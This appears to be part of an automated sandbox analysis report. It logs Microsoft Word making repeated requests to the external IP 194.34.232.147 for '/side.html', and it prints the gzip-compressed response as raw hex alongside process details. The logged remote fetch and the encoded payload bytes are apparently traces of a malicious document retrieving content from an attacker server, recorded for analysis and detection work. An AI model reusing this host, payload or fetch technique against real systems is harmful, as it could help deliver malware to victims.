      Data Ascii: MK0`!a` 2066%~{o?>G0HeF]V*tq48p8p8p);J,kIU8ZN>h=Y'^8lDuKm\I76dHu<[>} n~h,9}l<xcUJ]L'?e/0Lv
      Jun 16, 2022 13:30:46.204092979 CEST8OUTHEAD /side.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: 194.34.232.147
      Content-Length: 0
      Connection: Keep-Alive
      Jun 16, 2022 13:30:46.226705074 CEST8INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:46 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html
      Jun 16, 2022 13:30:46.648745060 CEST8OUTHEAD /side.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: 194.34.232.147
      Content-Length: 0
      Connection: Keep-Alive
      Jun 16, 2022 13:30:46.670380116 CEST9INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:46 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: text/html
      Jun 16, 2022 13:30:49.804140091 CEST12OUTGET /side.html HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: 194.34.232.147
      If-Modified-Since: Mon, 30 May 2022 20:51:09 GMT
      If-None-Match: "1a76-5e040d0ca4940-gzip"
      Connection: Keep-Alive
      Jun 16, 2022 13:30:49.826105118 CEST12INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:49 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940-gzip"
      Accept-Ranges: bytes
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Content-Length: 289
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html
      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed d9 4d 4b c3 30 18 07 f0 fb 60 df 21 16 61 db c1 06 f4 a6 ad e2 db 60 20 32 9c 30 0f 82 a4 c9 b3 36 98 36 25 89 d4 7e 7b 93 81 03 6f 9e c4 c3 3f 04 9e bc 3e bf e4 fc 14 47 ca ca 30 f6 c4 9a d0 9a cb e9 a4 48 91 19 d1 d5 65 46 5d 96 56 2a ab c6 14 bd 74 ba 0f 71 c4 f9 f5 1f 34 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 9c ff eb b0 d8 06 dd 29 3b e4 c6 4a 11 b4 ed f2 c6 d1 8e 95 2c 6b fd 49 eb 55 38 e7 5a b1 f5 ed f6 4e 8b ba b3 3e 68 c9 b8 7f d7 3d db 59 27 89 f1 5e 38 d1 b2 d7 6c f5 fc f6 44 95 b3 83 a7 a5 75 4b 6d a8 94 c2 5c 49 16 37 36 64 48 86 b5 b3 75 3c 5b 3e da f0 a0 7d 20 95 b6 6e 7e dc 68 8e e7 ab fb 97 f9 2c de 94 39 7d d2 6c b1 d0 3c cf 7f db b7 fb af 78 be 19 63 fa f6 ec 94 b7 bd d7 b5 0f 1f 55 4a 16 1f 99 5d 4c 27 05 3f 94 8b d2 e4 bb 86 c4 f7 65 a6 2f c8 88 30 4c 76 1a 00 00
      Data Ascii: MK0`!a` 2066%~{o?>G0HeF]V*tq48p8p8p);J,kIU8ZN>h=Y'^8lDuKm\I76dHu<[>} n~h,9}l<xcUJ]L'?e/0Lv
      Jun 16, 2022 13:30:50.034138918 CEST13OUTHEAD /side.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: 194.34.232.147
      Content-Length: 0
      Connection: Keep-Alive
      Jun 16, 2022 13:30:50.055707932 CEST13INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:50 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=96
      Connection: Keep-Alive
      Content-Type: text/html
      Jun 16, 2022 13:30:50.293109894 CEST13OUTHEAD /side.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: 194.34.232.147
      Content-Length: 0
      Connection: Keep-Alive
      Jun 16, 2022 13:30:50.315821886 CEST14INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:50 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=95
      Connection: Keep-Alive
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      4192.168.2.2249177194.34.232.14780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      Jun 16, 2022 13:30:46.797122955 CEST9OUTHEAD /side.html HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: 194.34.232.147
      Jun 16, 2022 13:30:46.818716049 CEST10INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:46 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html


      No statistics
      Target ID:0
      Start time:13:30:17
      Start date:16/06/2022
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f950000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      No disassembly